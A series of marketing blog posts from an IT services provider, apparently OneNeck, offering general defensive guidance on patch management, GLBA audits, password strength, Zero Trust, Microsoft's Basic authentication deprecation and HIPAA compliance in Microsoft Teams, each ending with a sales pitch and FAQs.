Many organizations have complicated IT environments, with a variety of systems, servers, and applications running on multiple platforms. This inherent complexity makes tracking which systems need patching and when challenging. Additionally, older systems and applications may not be compatible with all patches, making it difficult for organizations to maintain security and stability.

Patch Testing & Review

Before applying any patch, organizations must review all new releases alongside their accompanying notes and run tests to ensure updates won’t trigger compatibility issues with existing systems. This process is time-consuming and resource-intensive, especially for larger organizations with expansive IT environments.

Downtime Concerns

Applying patches often requires systems to be offline for a period of time. This downtime can potentially lead to a temporary loss of productivity and revenue. Because of this concern, patching is often pushed to non-typical business hours, forcing IT staff to work overnight or during weekends.

Resource Limitations

Many organizations have limited IT resources, making it challenging to prioritize patching in the face of other pressing demands on time and within budget.

The difficulty in patching for businesses is often due to a combination of these factors, including the sheer volume of systems and applications that need to be maintained and the need to balance security and stability with the demands of day-to-day operations. Despite these challenges, organizations must prioritize patching and adopt effective strategies for maintaining their systems.

Outsourcing Patch Management

Outsourcing patch management can be an effective solution for organizations that lack the expertise or resources to manage this process in-house. By working with an experienced vendor, organizations can ensure their systems are secure and up-to-date while freeing up internal resources to focus on other important tasks and initiatives. A business might choose to outsource patch management for numerous reasons:

Lack of In-house Expertise

Organizations may not have the technical expertise or resources to manage patching effectively. By outsourcing patch management, a business gains access to the skills and know-how of a partner specializing in this area.

Reviews, Tests and Validation

Review of release notes for all pertinent information and testing the effects of each patch are essential steps. An organization tackling this on its own will undoubtedly find the process both demanding and laborious. Enlisting external assistance speeds up validation and likely reduces cost.

Time and Staff Usage Reduction

Outsourcing patch management helps organizations save time and reduce expenditures by eliminating the allocation of internal staffing resources, thus freeing their IT teams to focus on more strategic projects and initiatives.

Improved Efficiency and Security

Organizations can benefit from a partner’s streamlined processes and automated tools, helping to reduce downtime and ensure patches are applied consistently and punctually.

Access to Best Practices

An experienced patch management vendor can bring best practices and expertise that an organization might not have access to otherwise.

Compliance

Many industries have strict regulations regarding data and systems security. By outsourcing patch management, organizations can ensure that they meet these protocols and maintain compliance with industry standards.

The benefits, especially for small and mid-sized businesses, of obtaining outside assistance with patch management go beyond those listed above. Engaging a partner to perform patch management allows for a patching timetable that compliments an organization’s production environment. Additionally, an experienced partner works with multiple clients, meaning well-rounded, real-world experience and the ability to adapt whenever necessary.

OneNeck Has Your Back!

While patching may be time-consuming and complex, it is critical to ensuring your organization is safe and secure from cyberattacks. OneNeck is here to help with an experienced team that provides solutions for patching and any other aspect of systems management that your organization may require. We have extensive experience across multiple platforms and industries, allowing us to provide a right-fit solution for you.

Contact us today to speak with a member of our team, and learn more about our patch management services here.

Check out our Monthly Patching Blog series to keep up to date on the latest critical updates from our vendors.

Frequently asked questions…

Who is responsible for patch management? 

While patching is often the responsibility of the operations or infrastructure team, it is a process that involves everyone in the organization.

What is a patch management plan? 

Patch management is the process for identifying, acquiring, testing, installing and verifying software and/or firmware updates. An effective patch management plan ensures all identified system components are the latest version supported by a vendor.

How do I create a patch management plan? 

Creating a patch management plan is accomplished by developing a process that performs necessary patching in a consistent and timely manner. Organizations must identifies updates, review release notes, test for system compatibility and perform installs with minimal disruption to operations.

Is patch management a part of cybersecurity? 

Patch management is an essential aspect of an organization’s cybersecurity posture. Unpatched software applications or operating systems are a prime cause of security breaches.

What the GLBA Audit Includes and How to Navigate the Pre-Audit Process

The  Gramm-Leach-Bliley Act (GLBA) is longstanding United States law that includes provisions protecting the privacy of consumers’ financial information. The GLBA applies to all institutions offering consumers financial products or services. The U.S. Department of Education Federal and Student Financial Aid Office has asserted that Title IV Institutions of Higher Education are considered “financial institutions” and thus subject to the GLBA.

In October 2021, the FTC announced revised provisions of the Safeguards Rule requiring non-banking financial institutions, such as institutes of higher education, to develop, implement and maintain a comprehensive security system to keep their customers’ information safe.

Successfully enacting these provisions is critical for passing a GLBA audit. Initially set to take effect on December 9, 2022, a six-month extension was granted, pushing the deadline to June 2023.

Safeguards Rule

The Safeguards Rule instructs organizations to implement administrative, physical and technical protections as safeguards against cyberattacks, email spoofing, phishing schemes and similar cybersecurity risks. These provisions are where educational institutions will likely struggle to achieve and maintain compliance. Identifying and assessing risks, developing and maintaining an information security program and creating detailed incident response plans are a heavy drain on time, staffing and a school’s limited resources. Obtaining outside assistance in these areas is often a necessity.

GLBA Audit for Educational Institutions

With the June deadline fast approaching for institutions of higher education, it is imperative that schools not only understand what provisions auditors are examining but also how to prepare for the GLBA audit process. A proper pre-audit assessment demands action and input from multiple staff members, including those in the financial offices (Financial Aid Office, Registrar, etc.), security (both physical and digital) and others in information technology. Coordinating and performing such an undertaking will likely involve teaming with an experienced outside partner.

Your organization may already be employing some provisions, such as encryption of sensitive data, limiting and monitoring information access, as well as staff training on security and information security. If not, these practices should be part of your institution’s overall security program.

Other provisions, such as the designation of a qualified individual to oversee an institution’s information security program and the training of security personnel, are aspects that organizations must plan out based on available personnel. While the Safeguards Rule does mandate a qualified individual oversees the GLBA-required security program, this individual may certainly receive assistance (internal or external) in this management.

The provisions for which educational institutions will likely require outside assistance are the performance of risk assessment and the development of an IR plan as part of a comprehensive security program. Even if some aspects already exist within an educational organization, the scope and complexity of the GLBA requirements will likely exceed the time and resources available to a school’s IT staff. Engaging a knowledgeable partner who can perform a comprehensive pre-audit assessment and communicate effectively on risk and mitigation steps is highly recommended – and by doing so – completes one of the audit requirements.

Pre-Audit Risk Assessment

Performing a Risk Assessment should utilize industry-standard security frameworks such as the Center for Internet Security (CIS) Controls or NIST SP 800-171. Use of these frameworks, while not currently obligatory, does represent a best practice when preparing for any cybersecurity audit. The Student Financial Aid Office has suggested Title IV institutions consider using the NIST SP 800-171 framework for risk self-assessment. However, the simplicity of the CIS Controls framework is a viable option that may be a better fit for organizations with less robust security staff. The CIS controls are a straightforward set of 18 controls that provide actionable steps for minimizing data breaches and significantly reducing the risk of cyberattacks.

Using a chosen cybersecurity framework, like NIST or CIS Controls, institutions must conduct a risk assessment across all covered organizational units. Upon risk identification, concise documentation for each safeguard employed is necessary for tracking implementation progress. Risk assessments that meet auditor requirements will address the following:

• Employee security training and management
• Organizational vulnerabilities
• Understanding of threats that might exploit those vulnerabilities
• Creating concise documentation for the actions taken to mitigate all discovered risk

Security Program’s Incident Response Plan

While self-assessment helps identify risks and creates measures for eschewing them, breaches are always possible. Constructing a response plan for security events is vital to passing the audit. In the unfortunate but likely event that a breach occurs, it is critical to have an established plan to handle communications and coordinate investigation, containment and rapidly eradicate the attack. Auditors are looking for institutions to have a security program that includes a written IR plan providing for the following components:

• Identification of types of incidents that could occur, such as data breaches, cyberattacks or natural disasters
• Establishment of an IR team with specific roles and responsibilities
• Procedures for identifying and responding to incidents, including steps for containment and mitigation, preservation of evidence, as well as notification to affected individuals, key stakeholders (including employees, students or parents) and regulatory authorities
• Testing of the IR plan through scheduled drills and exercises
• Periodic review and update of the IR plan that adapts to institutional changes or external threats
• Recording of incidents, responses, outcomes and measures to prevent reoccurrence

Beyond the Assessment

Ultimately the goal is not just to pass the audit through a series of ‘check the box’ exercises but to truly secure data and infrastructure. The GLBA audit process is not just a one-time action but rather a long-term commitment to a series of best practices. To be done correctly requires significant resources and time and involves constant reassessment and adjustments to meet current and future risks.

OneNeck’s experienced team is here to help prepare for GLBA audit compliance and continue working with your technology team to allow your security posture to mature. Our pre-audit services include a requisite risk assessment of security controls that fall under GLBA, assistance documenting your security program and review or development of an IR plan that assists in accurately identifying processes and procedures in the event of an incident.

Contact us to speak to a member of our experienced security team today.

Frequently asked questions…

What happens if you violate GLBA?

Violating the GLBA (Gramm-Leach-Bliley Act) can result in severe penalties, including fines and legal action. The exact consequences depend on the severity of the violation and can range from monetary penalties to imprisonment for individuals found guilty of criminal violations.

What are the three key rules of GLBA?

Firstly, financial institutions must provide customers with privacy notices explaining how they collect and share customers’ personal information. Secondly, customers must be given the option to opt-out of having their information shared with non-affiliated third parties. Thirdly, financial institutions must implement appropriate safeguards to protect customers’ personal information.

Who does the GLBA Safeguards rule apply to?

The GLBA Safeguards rule applies to financial institutions, including banks, credit unions, securities firms, and insurance companies, as well as non-financial institutions, that receive or maintain personal information about customers of financial institutions in connection with providing services to those institutions.

What is the goal of the FTC Safeguards Rule?

The goal of the FTC Safeguards Rule is to protect consumers’ personal information held by financial institutions by requiring them to develop and implement comprehensive information security programs. The rule aims to ensure that financial institutions are taking appropriate measures to safeguard sensitive customer information from unauthorized access, use, or disclosure.

Password Security Challenges

Passwords have long been the leading method of authentication and protecting sensitive information. However, as technology advances and the sophistication of cyber threats continue to evolve rapidly, the security of passwords is critical. Everyone must ask, “Is my password as safe as I think it is?”

The principal issue with passwords is that they can be easily compromised. Hackers use various techniques to obtain passwords, including socially engineered phishing attacks, keyloggers, and dictionary attacks. Additionally, many users employ weak, easily guessable passwords, some of the most common being “123456”, “password,” or “guest.” Using unsafe passwords makes it easy for hackers to access accounts and steal sensitive information.

Another challenge of passwords is that if users forgo short and obvious passwords, they often run into the issue of password retention. Everyone has multiple accounts and passwords, and it can be challenging to keep track of them all. As a result, people often reuse passwords across multiple accounts or write them down (monitor sticky-note, anyone?), thus compromising security.

Finally, even when following best practices, there are still risks concerning the security of password databases. If an organization’s password database is hacked, all of its users’ passwords face the potential of being exposed. These breaches have occurred in several high-profile instances, compromising millions of passwords and associated user ids.

So, are passwords as safe as most users think they are? Probably not. While passwords certainly provide some level of protection, they are not infallible, especially on their own. However, everyone can employ several tips and strategies that vastly decrease the likelihood of their accounts being compromised.

Ways to Protect Your Passwords

It should come as no shock that strong and unique passwords are safer and more challenging to crack. Even with this knowledge, many individuals still fail to put it into practice consistently. Length, complexity and account separation are all crucial factors to consider when creating strong passwords.

Password Length–

The length (total number of characters) is one of the essential aspects of password effectiveness. At its most basic, longer passwords are more difficult to crack because they have a larger number of possible combinations. Thus, it is harder for an attacker to guess the correct password through a “brute force” attack, which systematically tries many combinations of characters to guess a password. The attacker uses software to automate the process of trying different combinations and often starts with the most commonly used characters or words. More sophisticated brute force attacks can also include “password dictionaries,” lists of words and phrases of the most widely used passwords.

Each character increase in the length of a password exponentially adds to the possible combinations a brute force attack must try to compromise that password successfully. The generally accepted minimum password length by cybersecurity experts is 14 characters. A 14-character password made up of random letters and numbers has possible combinations of approximately four quadrillion (yes, with a “q”). The sheer volume of possible combinations significantly fortifies passwords against brute-force attacks.

Password Complexity–

A second vital aspect of password effectiveness is complexity. Ultimately complex passwords are more difficult to crack than simple ones and thus provide a more robust level of security. A complex password includes a mix of characters, such as uppercase and lowercase letters, numbers, and special characters – including spaces when permitted. Using a mixture of characters vastly increases the number of possible combinations.

Another reason why complexity is essential is that it makes it harder for an attacker to use the aforementioned “dictionary” attack. If your password is a complex, unique and random string, it is not likely to be found in the attacker’s pre-computed list. This complexity also makes it difficult for anyone, even individuals in direct contact with a user, to deduce or guess a password.

Password Separation–

Using separate passwords for different accounts is vital for security as it reduces the risk of compromising multiple accounts if a password is stolen or otherwise obtained by an attacker. If the same password is used for multiple accounts, and an attacker can obtain that password, they potentially have access to all associated accounts. Breaches like this can be particularly problematic if one of the accounts is sensitive, such as an organizational or financial account.

If an attacker obtains a password, when using separate passwords for all accounts, the attacker will only be able to access the account associated with that password. They will not be able to access any other accounts, limiting the damage they can do. This separation of passwords keeps individuals protected against automated attacks called “credential stuffing,” where attackers use lists of stolen usernames and passwords (often from another data breach) and try them on a variety of accounts (emails, credit cards, businesses, etc.). Using a unique password for each account reduces the possibility of a compromised password having a far-reaching negative impact.

How Long Does it Take to Crack a Password?

Here is an excellent visual representation that illustrates the above concepts. It shows how long, via today’s modern computing power, it takes for brute force attacks to crack passwords of various lengths and complexity. Many public email providers require a minimum 8-character password, which, even when using a combination of numbers, upper and lowercase letters and symbols, can be cracked in 8 hours—increasing this by one character ups the total to 3 weeks. Utilizing a password with 14 characters raises the estimate to 200 million years!

Creating a Strong Password

To review, a password must be long (preferably at least 14 characters) and complex (including numbers, letters, symbols and spaces when permitted). Additionally, each account should have a unique password. Since the average person has dozens of accounts, keeping track of and managing passwords can be challenging. There are recommended strategies to incorporate and some things to avoid that benefit not only strong password creation but also organization.

• Don’t use obvious details as passwords. Family members or pets’ names are among those most commonly associated with passwords. While variations of these names may be simpler to remember, this information is generally easy to find online as open-source intelligence (OSINT) and result in readily compromised passwords. The same holds for important dates (birthdays, anniversaries, etc.) and locations (addresses or hometowns).
• Instead of passWORDS, think more in terms of passPHRASES. Passphrases are typically longer than passwords and, therefore, harder to crack. A passphrase made of multiple random words can be more difficult to guess than a shorter, alphanumeric password, even if the password is considered complex. As with passwords, combinations of uppercase and lowercase letters, special characters and numbers are recommended.

Additionally, passphrases are often more memorable than random strings of characters, making it less likely that the user will have to write the passphrase down or store it in an unsecured location. They can also be harder to steal through phishing or social engineering tactics because, in most cases, they don’t contain personal information.

• Password managers are a great way to keep track of login credentials. These tools use encryption to store and generate complex passwords for all online accounts. Additionally, they are configurable to fill in login information automatically, eliminating manual entry of usernames and passwords. Thus, logging into accounts is more convenient and secure by making it less likely for accounts to be vulnerable via weak or reused passwords. Another benefit of password managers is minimizing exposure to phishing attacks. If a user unknowingly clicks a bad link, the password manager will not offer to fill in login credentials because it does not recognize the imposter website.
• Finally, whenever possible, use multi-factor authentication (MFA). MFA makes it considerably more difficult for attackers to gain unauthorized access to an account, even when they have access to an account password. MFA can help defend against phishing, keyloggers and malware attacks by requiring the attacker to steal or replicate a second factor (e.g., a phone) to pass the MFA check. Security in layers is a best practice, and while not foolproof, MFA provides an additional layer of security that can significantly reduce the risk of unauthorized access to your accounts.

OneNeck – A Security Partner You Can Trust

As an experienced IT security services provider, OneNeck is here to help. Our team can assess your current security posture, develop a defense strategy, and help you better leverage your existing security investments. Contact us today to speak with a OneNeck security professional.

Frequently asked questions…

What is the safest way to protect passwords?

The safest way to protect passwords is to use a strong, unique password for each account, and to store them securely using a password manager. A password manager encrypts and stores your passwords, making them accessible only with a master password or biometric authentication, and can generate strong, random passwords to help ensure maximum security.

What is a passphrase?

A passphrase is a series of words or other text used as a password or key to protect access to an account, device, or other resource. Passphrases are typically longer and more complex than traditional passwords, and can be easier to remember while also providing greater security against brute-force attacks.

Do security experts recommend password managers?

Yes, many security experts recommend using password managers as a secure way to manage passwords. Password managers can generate strong, unique passwords for each account, store them securely, and automatically fill them in for you, reducing the risk of password reuse, weak passwords, and other security issues. However, it’s important to choose a reputable password manager and follow best practices for password security, such as using multi-factor authentication and regularly changing passwords.

What is the difference between 2FA and MFA?

2FA stands for “two-factor authentication,” which requires users to provide two forms of authentication to access a resource, typically a username/password combination and a one-time code sent via SMS or generated by an app. MFA, or “multi-factor authentication,” is a more advanced form of 2FA that requires additional forms of authentication, such as a fingerprint or facial recognition, in addition to the traditional username/password and one-time code.

The end of the year is a time when businesses are wrapping things up. This sense of closure, coupled with the fact that people are taking time off, brings everyone’s guard down. While letting your guard down may be good for your family, it’s not the best idea when it comes to cybersecurity. 

Cybercriminals are savvy and look for opportune times to conduct their attacks. They know the holiday season is a great time to take advantage of people’s generosity and goodwill. The best defense for your business is to understand the tactics bad actors use to infiltrate IT security. To that end, we’ll consider seven best practices to protect your organization as the end of the year rolls around. 

7 Best Practices to Help Secure Your IT Infrastructure

1. Install software updates and patches promptly.

Security patches are created in response to developing threats and are usually released because the threat is deemed too serious to wait until a major software update. Installing patches as they become available helps businesses mitigate risk by ensuring vulnerabilities exist for as short a time as possible. Additionally, having policies to keep up with updates when employees are out of the office and during downtime (especially at the end of the year) helps keep your business systems running smoothly.

2. Use strong passwords and change them regularly.

It’s estimated that 81% of data breaches happen because of poor passwords. A seemingly small change can make a huge difference in your organization’s security. The end of the year is a great time to prompt employees to change their passwords. When doing so, encourage them to use 16 characters or more, as this strengthens password security.

3. Restrict access to sensitive data to authorized users only.

By restricting access to what’s strictly necessary, companies can reduce the risk of unauthorized users accessing and compromising that data. When attacks are likely, such as during the holiday season, reviewing your access policies helps ensure there are fewer people who can possibly mishandle sensitive data. Another reason is compliance. Many regulatory bodies require companies to restrict access to sensitive data in order to meet compliance requirements.

4. Educate employees on cybersecurity best practices.

Education is one of the best ways to defend against potential security risks. Training should be relevant to employee jobs to keep them engaged; the less generic, the more likely they are to heed the warnings. Training can include topics like the dangers of clicking on links, opening attachments from unknown sources, using strong passwords, and keeping their personal devices updated. Why not schedule training right before security is on high alert and send out a refresher when employees are more likely to let their guard down? 

5. Protect against phishing scams and malware attacks

New phishing scams and malware attacks arrive daily, so there’s no way you can train on the specifics. But you can help your employees practice good cyber vigilance to recognize the signs. For example, they should be aware of the red flags of a scam email or phishing call, such as poor grammar or requests for personal information from people they don’t know. They should also be cautious about approving application authorizations if they don’t have explicit knowledge of who’s requesting it. Tips like these could be included in the cybersecurity refresher we recommend sending out.  

6. Use two-factor authentication whenever possible.

Two-factor authentication is a cybersecurity best practice that requires employees to use two forms of identification to log in to their accounts. So even if a password becomes compromised, the hacker still needs a second authentication. In fact, a 2019 Microsoft report found that two-factor authentication blocked 99.9% of automated attacks.

7. Have a plan in place for dealing with a cybersecurity incident.

Whatever your efforts, no security plan is impenetrable. And a cybersecurity incident can have many negative consequences for an organization, including loss of data, decreased productivity, and financial damage. Having a plan in place will help you mitigate the effects in case of an incident. This plan should include steps for preventing and responding to incidents, as well as procedures for communicating with stakeholders.

Don’t Stress. Take the Proactive Approach Instead

At the end of the year, security isn’t always top of mind. By educating your organization on how to work securely, you mitigate many of the dangers hackers use during the holiday season.  

It’s also possible you’re looking for a partner to help fortify your security practices or provide needed security leadership. If that sounds like you, visit our IT security services page to learn more about what we offer. We’re here to help! 

Stay safe out there, and happy holidays! 

Frequently asked questions…

Why is patch management important?

Patch management is important because it helps to ensure that software and systems remain up-to-date and secure. By regularly applying patches, organizations can fix vulnerabilities and reduce the risk of cyberattacks or other security breaches. Additionally, patch management can help to improve system performance and reliability.

What is incident response in cybersecurity?

Incident response is the process of identifying, investigating, containing, and recovering from security incidents in order to mitigate the impact of a cybersecurity breach or attack. The goal is to minimize the damage caused by the incident, prevent it from spreading, and restore normal operations as quickly as possible.

What type of password are hardest to crack?

Having a long mix of upper- and lower-case letters, symbols and numbers is the best way make your password more secure. The safest way to protect passwords is to use a strong, unique password for each account, and to store them securely. Security experts recommend using passwords of at least 14 characters.

It’s October, which everyone knows means time for trick-or-treating, pumpkin-spiced everything and cybersecurity awareness. Ok, possibly you didn’t immediately think of that last part. However, October is Cybersecurity Awareness month and with it comes the announcement from the Cybersecurity and Infrastructure Security Agency (CISA) and the National Cybersecurity Alliance (NCA) that this year’s theme is “See Yourself in Cyber.” The goal is to highlight that whether one works in network security or is exclusively an end user, everyone has a role to play in strengthening cybersecurity.

After years of highly publicized ransomware attacks and expensive data breaches, it has become clear that organizations must allocate considerable resources for cybersecurity. This emphasis is necessary to protect company data, promote customer trust, and maintain compliance with the government and other regulatory agencies. Investment in secure and resilient infrastructure and applications such as next-generation firewalls, advanced backup and disaster recovery solutions, and utilizing IaaS and SaaS continues to significantly increase. However, broader cybersecurity awareness campaigns have yet to obtain such ubiquitous adoption status.

While most organizations acknowledge the importance of cybersecurity mindfulness, investing in and committing to cybersecurity awareness initiatives still lag significantly behind this stated recognition. This lack of prioritization, in many cases, is originated at the Board of Directors (BOD) level. There are many reasons for potential BOD hesitancy to support fully implementing cybersecurity campaigns, but some of the more common themes and means to address them include:

• Budgetary Concerns– All organizations have a limit to the resources designated for security. In many cases, it is often easier to convince board-level members to allocate these assets for infrastructure, applications or even additional staffing. Garnering support to assign these resources to less-tangible elements, such as security awareness training, is often challenging. Bringing to the BOD assessments that demonstrate how security training aids an organization while concurrently underscoring the costs of inaction can go a long way in convincing board members of the elevated ROI they will see from implementation.
• Lack of Cybersecurity Understanding– Education is vital. Company leadership will not support or approve campaigns they do not understand. It is common for leadership to view cybersecurity as an “IT issue” and not something that involves the entire organization. To raise the levels of understanding, one must ensure board members themselves are involved in cybersecurity training and are aware of not only the benefits of proactive company-wide approaches to cybersecurity but simultaneously understand the financial and reputational ramifications of breaches or attacks.
• Resistance to Change– Technology is evolving, and so are the threats. The modern workplace requires a modern approach where everyone is part of the solution. Ultimately individuals, including board members, don’t like change and often want to continue doing things as they have always been. A prospective way to combat this inertia is by increasing board member involvement in planning cybersecurity activities and training. When you have full board-level support for a cybersecurity awareness initiative, all employees and team members will eventually be able to “see themselves in cybersecurity” and recognize that compliance with training exercises or policies is a core component of their profession.

When asked about obtaining board-level support for cybersecurity awareness campaigns, Katie McCullough, Chief Information Security Officer at OneNeck, advised, “At its core, cybersecurity is about assessing, managing or removing risk to the availability of customer’s critical data and services. By ensuring cybersecurity is included as part of any Enterprise Risk Management (ERM), one can typically help drive the awareness and support of these campaigns through scheduled reviews of the ERM, by the Board of Directors.”

Clarification of why organization-wide cybersecurity awareness matters before successfully bringing cybersecurity campaign concepts to the BOD’s attention is imperative. Begin by stressing that critical concepts such as data protection and holistically solid security posture are at their core intelligent business decisions. This can be followed by emphasizing awareness training provides significant ROI, with expenses for designing and implementing awareness campaigns being greatly overshadowed by the cost of a breach. Finally, it is wise to highlight the short-term inconvenience of awareness training will materialize into significant long-term gains. Ultimately, the goal is to work with your BOD to answer questions and provide information, so they feel comfortable making informed decisions.

Another area to underscore to board members is that they are accountable for the organization’s cybersecurity. We see an extreme example of this accountability by analyzing the well-publicized breach of SolarWinds. In November of 2021, investors sued the BOD, claiming knowledge of cybersecurity vulnerabilities before a data breach and subsequent failure of action.

While a lawsuit may not be the most likely outcome of a cyberattack, it nonetheless serves as a stark reminder to board members that they are ultimately responsible for how organizations secure themselves. Having proactive board-level conversations about cybersecurity awareness helps protect the organization’s customers, profits, reputation and the Boards of Directors themselves.

Encouraging professional education for board members is another technique for getting board-level buy-in. Katie McCullough notes, “More and more companies are looking for Board of Directors to consider certifications such as NACD Certification program, which includes a certification for Cyber-Risk Oversight as an emerging area of board oversight.”  Board members can use training resources to:

• Learn foundational principles for board-level cyber-risk oversight.
• Increase comprehension of issues, including allocating cybersecurity responsibilities, legal implications, setting expectations about the organization’s cybersecurity processes and ways to improve employee engagement in security practices.
• Gain the ability to apply procedures and tools to improve organizational practices by focusing on specific risk components, including insider threats, third-party exposures, merger and acquisition due diligence, and adequate risk disclosure.

Board of Director buy-in is key to any organization having an effective cybersecurity awareness culture. For everyone in an organization to “see yourself in cyber,” the impetus must come from the top. Implementations of awareness campaigns, whether specifically designed to coincide with Cybersecurity Awareness Month or throughout the year, will only be effective if they are supported and promoted by company leadership.

While we have discussed several strategies and potential tools that can be used to secure top-level support, the essential thing to remember when dealing with board members is that despite their lofty positions, they are ultimately still just people. Effective communication, proper education and comprehensive information on the organization-wide benefits of cybersecurity awareness campaigns will go a long way in securing board-level support and approval.

In my last blog on Zero Trust (on June 6 of this year), I talked about the reasons why Zero Trust is becoming more popular and why the change is necessary.  In this blog, I want to delve more into what does a Zero Trust model buy you and what you still need to do in your security program alongside Zero Trust.

At its core, Zero Trust is making the decision that all access to applications, data and resources should be checked and strongly verified on a continuous basis.  This helps your organization in several ways…

Zero Trust helps provide a mechanism for strong identity protection. As protecting identities (both normal and privileged) has become one of the main focuses of security, more and more security tools and business processes hone in how to recognize how identities are being used and what access should they have.

This is really important because of the way applications and data are now dispersed. As security operation teams are trying to baseline access, it becomes instrumentally important to know the context of which identities are logging in, from where, and on what device.

One of the goals of Zero Trust should be to limit the number of people or identities that access your systems, data and applications, allowing you to watch possible compromised account activity and prevent compromises. Using strong authentication and just-in-time access, along with watching login activity, will greatly reduce the chance for compromised accounts. This makes life a lot simpler operationally and maybe in application development.

Now that you have a single method for access and are using a consolidated identity with strong authentication and baseline login activity, this allows organizations to expose resources internally as they would externally. Now internal applications and resources can feel like cloud applications and resources when it comes an employee access – the login method could be the same and the security can be the same. This innately helps with identity protection and gives flexibility to possible new ways for remote access for remote workers.

This also increases visibility with security operational staff, as security operations can now focus on less things to monitor and alert on. They can develop access polices that can be applied to more applications, data and infrastructure because the access method has be simplified, and reacting to compromised account indicators will be faster since logins have been baselined.

Additionally, the number of security tools might go down because access has changed and simplified. This is in contrast the older security model where access could wildly vary depending on endpoint network location and identity used.

What do you need beyond Zero Trust?

There are things that still need to be done beyond Zero Trust. While Zero Trust does help in many ways, it does not cover all aspects of what an effective security program still requires.

• Organizations still need to have strong policies and standards.
• They need to have a working vulnerability program that covers as many assets as possible.
• Remediation for found vulnerabilities needs to happen in a timely manner.
• Data protection has to be carefully planned and documented in case someone or thing has compromised the integrity of the data.
• Business continuity plans need to be in place and rehearsed.
• Endpoint security must works with your Zero Trust strategy.
• Security operations has to be built or outsourced to provide a response to security indicators.
• Tools have to be in place to take in those indicators and provide alerts.

In summary…

This is a high-level view of the benefits of Zero Trust and what other aspects of security must coexist alongside that architecture and solution for effective security strategy.  In my next post, I will go into more detail on the components of Zero Trust and things to consider to get started planning and implementing it in your organization.

In the meantime, if you’re considering Zero Trust in your environment and want to discuss,  just contact us, and one of our security experts is here to help.

For the past two years, Microsoft has been winding down the allowance of Basic authentication for its Exchanges services, and in September, Microsoft announced the altering of the authentication method supported by Exchange Online. As a result, Cisco Unity integrations to Exchange Online (M365) for Unified Messaging will be affected.

Traditionally, applications have connected to servers, services and API endpoints by sending a username and password via every request. Basic authentication is typically enabled by default due to its simplicity of setup. However, this authentication method is now viewed as an outdated industry standard and has become increasingly vulnerable to threats.

End of Microsoft Basic Authentication

On October 1, 2022, Basic authentication will be deprecated. As a result, support will only continue for applications using OAuth-based authentications. How does this affect those who utilize Cisco Unity? Simply put, it means that for any users of Cisco Unity Connection 11.5(1) SU7/12.5(1) SU1 and all older releases, Unified Messaging with Microsoft 365 will cease to work after the deprecation of Basic authentication.

Cisco Unity Connection Must Use OAuth-based Authentication

Cisco has stated that releases 11.5(1)SU8 / 12.5(1)SU2 and all newer versions of Cisco Unity Connection support both OAuth-based and Basic authentication for Microsoft 365:

Microsoft will support both types of authentications until the complete deprecation of Basic authentication. Upon completion of this changeover, users must exclusively utilize OAuth-based authentication.

Therefore, any customer currently using an earlier version of Cisco Unity Connection will need to update their deployment should they wish to continue using Unified Messaging with M365. Upon completing this upgrade, Cisco instructs that system administrators can configure the authentication method via the Unified Messaging Service Configuration page of the Cisco Unity Connection Administration.

Need More Time? What Can You Do?

For any organization that still requires updating its Unity Connection but needs additional time, Microsoft has announced there will be an opportunity to postpone this change. Customers can use self-service diagnostics to re-enable Basic authority for any protocols they need, once per protocol.

This postponement will be allowed between October 1 and December 31, 2022. However, it is critical to note that any protocol exceptions or re-enabled protocols will be turned off during the first week of January 2023, with no possibility of further use.

OneNeck, We’ve Got Your Back

If you have any questions or are unsure your Cisco Unity Connection is ready for OAuth-based authentications, we’re here to help.  Talk to one of our experienced team members today, and ensure your Cisco Unity Connection is future-ready.

OneNeck customers dealing with electronic private healthcare information (ePHI) often ask the question is Microsoft Teams HIPAA compliant? These customers utilize M365 and Teams within their organizations and value the easy and effective collaboration it brings. Still, they are concerned about the implications of using these services when PHI is so critical to their business.

So, is Microsoft Teams HIPAA compliant?

Absolutely. However, there are steps that every organization must take to establish and maintain this compliance.

The safeguards of the HIPAA Security Rule for compliance are broken down into three main sections: technical, physical and administrative safeguards. For our purposes, we’ll primarily focus here on the necessary technical safeguards.

One of the most important technology-related security HIPAA requirements is that all ePHI must be encrypted, so only authorized users can access the data or, in the event of a breach, compromised data will be indecipherable. Another crucial security requirement is that every authorized user with access to ePHI must have a unique user identification to monitor their use. As for physical devices, technology with HIPAA compliance must have an automatic log-off feature to prevent unauthorized access if said device is left unattended.

Microsoft Teams is developed with security at the forefront of its design and is well suited to meet HIPAA security requirements. Microsoft Teams has the following safeguards in place that assist in the securing of ePHI:

• Access Controls provide users with login credentials that are unique to them, ensuring that PHI is only accessible to authorized users.
• Single sign-on (SSO) enables users to secure access to related systems with one login credential (Microsoft Teams, M365, etc.).
• Multi-Factor Authentication (MFA) requires users to submit multiple credentials to access data (username and password, biometrics, security questions, etc.), thus certifying legitimacy.
• Audit Logs track access to ePHI to ensure observance of all the necessary standards.
• Encryption transforms ePHI into a format only accessible via a decryption key, preventing unauthorized access to data at rest and in transit.

It is essential to note that while Microsoft Teams does include the necessary security features for HIPAA compliance, in many cases, the organization and its users must properly configure specific settings along with the implementation of companywide policies ensuring the safeguards above are followed. Ultimately, your organization’s policies, IT department and users must actively work together to ensure compliance is not only initially attained but constantly maintained.

BAA (Business Associate Agreement)

Per HIPAA 45 CFR 164.504(e), a business associate agreement (BAA) is required for any organization that will process PHI on another company’s behalf. This agreement provides the required security controls, the responsibilities of the parties involved and how PHI can be used. Even with all necessary security policies and controls enabled in Microsoft Teams, it would not qualify for HIPAA compliance until a signed BAA is in place.

Fundamental aspects of a HIPAA BAA include:

• A description of how business associates are permitted and required to use PHI.
• A requirement that PHI only is used or disclosed as contracted or required by law.
• Business associates must utilize applicable security measures to ensure PHI is used in agreement with all contract terms.
• Requires reasonable steps be taken to resolve any breach as soon as one is detected.

Fortunately, Microsoft states on its website that it is willing to sign a BAA with organizations utilizing Microsoft Teams for PHI. It is important to note they also provide a disclaimer that the end user assumes the responsibility of ensuring that Microsoft Teams is configured for HIPAA compliance. Once this BAA is signed, an organization can process and store ePHI with Microsoft Teams. One additional important aspect of which to take note, is that even if an organization already has a signed BAA with Microsoft for M365 or other services, they must confirm that Microsoft Teams is specified; if not, an additional Microsoft Teams BAA is required.

Organizational Responsibility for Maintaining Teams Compliance

Even with Microsoft Teams’ built-in security controls and a signed BAA, every organization must understand that they ultimately bear the responsibility of ensuring their use of Microsoft Teams is HIPAA compliant. Organizations must place a priority on practicing the appropriate security hygiene necessary to minimize security risks.

To remain HIPAA compliant, your organization must make the security and safety of PHI paramount. This requires top-down buy-in from the entire organization. Not only must HIPAA policies and procedures be established, but appropriate security awareness training must be routinely conducted, so everyone involved understands these best practices.

